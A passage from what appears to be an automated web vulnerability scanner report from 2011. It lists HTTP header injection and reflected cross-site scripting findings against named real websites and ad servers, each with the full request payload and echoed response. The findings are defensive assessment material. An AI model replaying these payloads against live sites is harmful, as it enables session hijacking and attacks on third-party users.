Set-Cookie: FFChanCap=1583B1190,1#675962#675816|0,1,1:0,1,1;expires=Thu, 02 Jun 2011 15:41:13 GMT;path=/;domain=.zedo.com;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 1634247266 1634246238
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=121
Expires: Tue, 03 May 2011 15:43:14 GMT
Date: Tue, 03 May 2011 15:41:13 GMT
Connection: close
Content-Length: 2322

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',e6567
ed
...[SNIP]...

5.5. http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload 18d0f%0d%0a36d0a27c0b4 was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-405/d3/jsc/fmr.js?c=1&a=0&f=&n=1190&r=5&d=9&q=&$=18d0f%0d%0a36d0a27c0b4&s=1&z=0.9079998980845427 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1
Cookie: ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1190:18d0f
36d0a27c0b4
;expires=Wed, 04 May 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1190,1,9;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1583B1190,1#675962|0,1,1;expires=Thu, 02 Jun 2011 15:40:54 GMT;path=/;domain=.zedo.com;
Set-Cookie: ZEDOIDA=BiLATcGt89ZkdupVLqY8Dm7H~050311;expires=Fri, 30 Apr 2021 15:40:54 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFgeo=2241452;expires=Wed, 02 May 2012 15:40:54 GMT;domain=.zedo.com;path=/;
ETag: "19b86ed-8181-4a12b03c8ce80"
Vary: Accept-Encoding
X-Varnish: 920079178 920078218
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=140
Expires: Tue, 03 May 2011 15:43:14 GMT
Date: Tue, 03 May 2011 15:40:54 GMT
Connection: close
Content-Length: 2869

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',18d0f
36
...[SNIP]...

5.6. http://www.askdramy.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.askdramy.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload a720f%0d%0a24490a51821 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /a720f%0d%0a24490a51821 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.askdramy.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 10:42:41 GMT
Location: /a720f
24490a51821
/


5.7. http://www.grubhub.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.grubhub.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload cd452%0d%0aa194e2e2a1a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /cd452%0d%0aa194e2e2a1a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.grubhub.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 03 May 2011 10:28:28 GMT
Server: Apache
Set-Cookie: JSESSIONID=A365883DD17EA18AD1623BFA28073728.worker3; Path=/
Location: /cd452
a194e2e2a1a
/
Content-Length: 0
Cache-Control: max-age=0
Expires: Tue, 03 May 2011 10:28:28 GMT
Content-Type: text/plain; charset=UTF-8


5.8. http://www.haircuttery.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haircuttery.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 31e48%0d%0ab59fdd1e939 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /31e48%0d%0ab59fdd1e939 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.haircuttery.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 03 May 2011 11:27:09 GMT
Server: Apache
Location: http://www.haircuttery.com/31e48
b59fdd1e939
/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


5.9. http://www.homebasedofficework.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.homebasedofficework.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6e3ad%0d%0a25fc8e03120 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6e3ad%0d%0a25fc8e03120 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.homebasedofficework.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 11:11:26 GMT
Location: /6e3ad
25fc8e03120
/


5.10. http://www.imaxenes.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.imaxenes.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 867ba%0d%0a01729b53b75 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /867ba%0d%0a01729b53b75 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.imaxenes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 03 May 2011 10:47:39 GMT
Server: tigershark/3.0.128 (dn-fh23.directnic.com)
Location: http://recorta.com/abriendo.html/867ba
01729b53b75

Content-Type: text/html
Content-Length: 1185

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
   <META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
   <STYLE type="text/css">
   <!--
       BODY { margin:
...[SNIP]...

6. Cross-site scripting (reflected)
There are 140 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


6.1. http://a.collective-media.net/adj/cm.rev_lee/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.rev_lee/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58406'-alert(1)-'d4ead3c9a98 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.rev_lee58406'-alert(1)-'d4ead3c9a98/;sz=300x250;ord=0.3433780161396228? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
Content-Length: 447
Date: Tue, 03 May 2011 15:43:27 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: JY57=CT; expires=Tue, 31-May-2011 15:43:27 GMT; path=/; domain=.collective-media.net
Set-Cookie: cli=11fda490e18de56; domain=collective-media.net; path=/; expires=Thu, 02-May-2013 15:43:27 GMT
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 02-Jun-2011 15:43:27 GMT
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.rev_lee58406'-alert(1)-'d4ead3c9a98/;sz=300x250;net=cm;ord=0.3433780161396228;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

6.2. http://a.collective-media.net/adj/cm.rev_lee/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.rev_lee/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 291cc'-alert(1)-'8906a7a5ed8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.rev_lee/;sz=300x250;ord=0.3433780161396228?&291cc'-alert(1)-'8906a7a5ed8=1 HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
Content-Length: 451
Date: Tue, 03 May 2011 15:43:26 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: JY57=CT; expires=Tue, 31-May-2011 15:43:26 GMT; path=/; domain=.collective-media.net
Set-Cookie: cli=11fda490a30bd5b; domain=collective-media.net; path=/; expires=Thu, 02-May-2013 15:43:26 GMT
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 02-Jun-2011 15:43:26 GMT
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.rev_lee/;sz=300x250;net=cm;ord=0.3433780161396228?&291cc'-alert(1)-'8906a7a5ed8=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

6.3. http://a.collective-media.net/adj/cm.rev_lee/ [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.rev_lee/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 289a8'-alert(1)-'620c09b5ae1 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.rev_lee/;sz=300x250;ord=0.3433780161396228?289a8'-alert(1)-'620c09b5ae1 HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
Content-Length: 448
Date: Tue, 03 May 2011 15:43:25 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: JY57=CT; expires=Tue, 31-May-2011 15:43:25 GMT; path=/; domain=.collective-media.net
Set-Cookie: cli=11fda490648917b; domain=collective-media.net; path=/; expires=Thu, 02-May-2013 15:43:25 GMT
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 02-Jun-2011 15:43:25 GMT
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.rev_lee/;sz=300x250;net=cm;ord=0.3433780161396228?289a8'-alert(1)-'620c09b5ae1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

6.4. http://ad.turn.com/server/pixel.htm [fpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44b8e"><script>alert(1)</script>3f4eb266a47 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=44b8e"><script>alert(1)</script>3f4eb266a47 HTTP/1.1
Host: ad.turn.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4535108476472752264; Domain=.turn.com; Expires=Sun, 30-Oct-2011 15:41:35 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 03 May 2011 15:41:34 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=4535108476472752264&rnd=4463050882434824328&fpid=44b8e"><script>alert(1)</script>3f4eb266a47&nu=y&t=&sp=n&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

6.5. http://ads.adbrite.com/adserver/vdi/742697 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/742697

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1028d<script>alert(1)</script>d6377ee17ce was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/7426971028d<script>alert(1)</script>d6377ee17ce?d=3658195966029417970 HTTP/1.1
Host: ads.adbrite.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=3658195966029417970&rnd=3874368748143201778&fpid=12&nu=y&t=&sp=n&purl=
Cookie: Apache="168362123x0.728+1302188608x-1818389268"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUio2yMg1rzEsSDbLKa4xrDFQ0lFKSszLSy3KBEsr1dYCAA%3D%3D"

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Tue, 03 May 2011 15:43:21 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/7426971028d<script>alert(1)</script>d6377ee17ce

6.6. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55ecc"-alert(1)-"424757d50d8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=1x1&section=1603038&55ecc"-alert(1)-"424757d50d8=1 HTTP/1.1
Host: ads.bluelithium.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1190

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:41:42 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Tue, 03 May 2011 15:41:42 GMT
Pragma: no-cache
Content-Length: 4636
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ads.bluelithium.com/imp?55ecc"-alert(1)-"424757d50d8=1&Z=1x1&s=1603038&_salt=1888351049";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array
...[SNIP]...

6.7. http://ar.voicefive.com/b/rc.pli [func parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 8d130<script>alert(1)</script>841f814715e was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction8d130<script>alert(1)</script>841f814715e&n=ar_int_p87077372&1304455353874 HTTP/1.1
Host: ar.voicefive.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.specificmedia.com/serve/v=5;m=3;l=8610;c=143917;b=856866;ts=20110503114210;cxt=811200901:2280462
Cookie: ar_p87077372=exp=1&initExp=Tue May 3 15:42:17 2011&recExp=Tue May 3 15:42:17 2011&prad=124094&arc=184537%3F684451&; BMX_G=method->-1,ts->1304437337; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 03 May 2011 15:42:35 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteraction8d130<script>alert(1)</script>841f814715e("");

6.8. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9203"%3balert(1)//01b0ff57779 was submitted in the $ parameter. This input was echoed as d9203";alert(1)//01b0ff57779 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1&a=0&f=&n=1190&r=5&d=9&q=&$=d9203"%3balert(1)//01b0ff57779&s=1&z=0.01697743690668352 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(1)-%22ccebc516c28=1
Cookie: ZCBC=1; FFgeo=2241452; FFcat=1190,1,9; FFad=0; FFChanCap=1583B1190,1#675962|0,1,1; ZEDOIDA=-SHATcGt89Z6bBFZFIn3XV-r~050311; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1190:d9203";alert(1)//01b0ff57779;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1190,1,9;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1583B1190,1#675962#675816|0,1,1:0,1,1;expires=Thu, 02 Jun 2011 15:41:13 GMT;path=/;domain=.zedo.com;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 1634247266 1634246238
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=121
Expires: Tue, 03 May 2011 15:43:14 GMT
Date: Tue, 03 May 2011 15:41:13 GMT
Connection: close
Content-Length: 2342

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',d9203";alert(1)//01b0ff57779';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,d9203";alert(1)//01b0ff57779;z="+Math.random();}

if(zzuid=='unknown')zzuid='-SHATcGt89Z6bBFZFIn3XV-r~050311';

var zzhasAd=undefined;


                                               var zzStr = "s=1;u=-SHATcGt89Z6bBFZ
...[SNIP]...

6.9. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b330b"%3balert(1)//6065934c827 was submitted in the $ parameter. This input was echoed as b330b";alert(1)//6065934c827 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1&a=0&f=&n=1190&r=5&d=9&q=&$=b330b"%3balert(1)//6065934c827&s=1&z=0.9079998980845427 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1190:b330b";alert(1)//6065934c827;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1583B1190,1#675796|0,1,1;expires=Thu, 02 Jun 2011 15:40:56 GMT;path=/;domain=.zedo.com;
Set-Cookie: ZEDOIDA=CCLATcGt89YY4OotRHUqIUdE~050311;expires=Fri, 30 Apr 2021 15:40:56 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFgeo=2241452;expires=Wed, 02 May 2012 15:40:56 GMT;domain=.zedo.com;path=/;
ETag: "19b86ed-8181-4a12b03c8ce80"
Vary: Accept-Encoding
X-Varnish: 920079178 920078218
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=138
Expires: Tue, 03 May 2011 15:43:14 GMT
Date: Tue, 03 May 2011 15:40:56 GMT
Connection: close
Content-Length: 2543

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',b330b";alert(1)//6065934c827';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,b330b";alert(1)//6065934c827;z="+Math.random();}

var zzhasAd=undefined;


